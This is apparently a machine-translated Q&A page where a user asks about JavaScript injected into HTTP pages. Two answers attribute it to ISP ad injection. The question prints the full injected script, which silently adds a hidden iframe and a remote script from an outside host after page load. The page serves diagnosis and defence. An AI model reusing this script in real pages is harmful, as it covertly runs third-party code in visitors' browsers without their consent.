Codice JavaScript iniettato

Question

Codice JavaScript iniettato

#1 da (4 voti)
#2 da (3 voti)

3

Il mese scorso ho notato che il mio sito ha un Javascript iniettato (da view-source). L'ho chiesto al mio ospite e hanno detto di aver trovato un virus e di averlo risolto. Tuttavia, il Javascript è ancora lì - il ticket di supporto è ancora aperto: (

Recentemente, ho appena scoperto che tutti i siti Web HTTP che ho visitato hanno lo stesso codice JS iniettato. Il codice JS apparirà solo su HTTP, se il sito ha una versione HTTPS non verrà visualizzato alcun codice inserito.

Di seguito è il codice inserito. È un malware o qualche tipo di problema di sicurezza?

if (top == window) {
var layer8NameSpace = "layer8ns";
"undefined" == typeof window[layer8NameSpace] && (window[layer8NameSpace] = {}), window[layer8NameSpace].layer8Loader = function() {
    function e(e) {
        return "undefined" != typeof e && null !== e
    }

    function t() {
        var t = document.createElement("script");
        t.setAttribute("src", s), t.setAttribute("id", "fn_layer8_script"), t.setAttribute("async", ""), (null == document.head || e(document.head)) && (document.head = document.getElementsByTagName("head")[0]), document.head.appendChild(t)
    }

    function n() {
        var t = r();
        if (e(t)) {
            var n = t;
            i() && (n = d(t));
            var o;
            try {
                o = document.documentElement, o.appendChild(n)
            } catch (c) {
                o = document.body, o.appendChild(n)
            }
            a()
        }
    }

    function a() {
        function e(e) {
            var n = e.data;
            "l8IframeIsReady" === n.message && t()
        }
        window.addEventListener ? window.addEventListener("message", e, !1) : window.attachEvent("onmessage", e)
    }

    function r() {
        var t = document.createElement("iframe");
        if (e(t)) {
            t.setAttribute("id", "fn_layer8"), t.setAttribute("src", u), t.setAttribute("target", "_blank"), t.setAttribute("frameborder", "0");
            var n = /firefox/i.exec(navigator.userAgent);
            e(n) && n.length > 0 ? (t.style.height = 0, t.style.width = 0) : t.style.display = "none", t.frameBorder = "no"
        }
        return t
    }

    function i() {
        var t = !1,
            n = /android (\d+)/i.exec(navigator.userAgent);
        return e(n) && n.length > 0 && (t = parseInt(n[1]) >= 4), t
    }

    function d(e) {
        var t = document.createElement("div");
        return t.setAttribute("id", "fn_wrapper_div"), t.style.position = "fixed", t.style.display = "none", t.ontouchstart = function() {
            return !0
        }, t.appendChild(e), t
    }

    function o() {
        var t = void 0,
            a = this,
            r = function() {
                e(t) && (window.clearTimeout(t), t = void 0, n.call(a))
            };
        t = window.setTimeout(r, 1e4), "function" == typeof window.addEventListener ? window.addEventListener("load", r, !1) : window.attachEvent("onload", r)
    }
    var c = "http://globe.moreforme.net",
        u = c + "/l8/Layer8Servlet",
        s = c + "/scripts/Anchor.js";
    o()
};
var layer8Loader = new window[layer8NameSpace].layer8Loader }

javascript

posta Ramil 23.05.2017 - 20:27

fonte

2 risposte

Leggi altre domande sui tag javascript

I MUCU (come gli arduinos) sono interessati da Meltdown? Elenco hash per praticare il cracking delle password

score 4 · Answer 1

Come ha sottolineato @Arminius, questo viene iniettato dal tuo ISP per generare entrate. Così tanti casi simili si trovano come spiegato @ user52472.

Ma la soluzione a questo problema non è una VPN (in quanto è solo una soluzione), suggerirei di scegliere un ISP migliore e spiegare al tuo attuale ISP che questa è una pratica losca.

score 3 · Answer 2

È probabile che venga iniettato nelle pagine HTTP dal proprio ISP. Non sembra essere di per sé dannoso, ma sembra essere relativo alla pubblicità. Ecco che ho trovato il link . Non so che considererei più un problema di sicurezza che navigare in qualsiasi altro sito usando HTTP; mentre in questo caso è il tuo ISP a iniettare contenuti, un malintenzionato potrebbe fare la stessa cosa.

Per evitare che ciò accada, la soluzione migliore sarebbe passare a un ISP che non ha un comportamento discutibile. Se questo non è possibile, usa una VPN.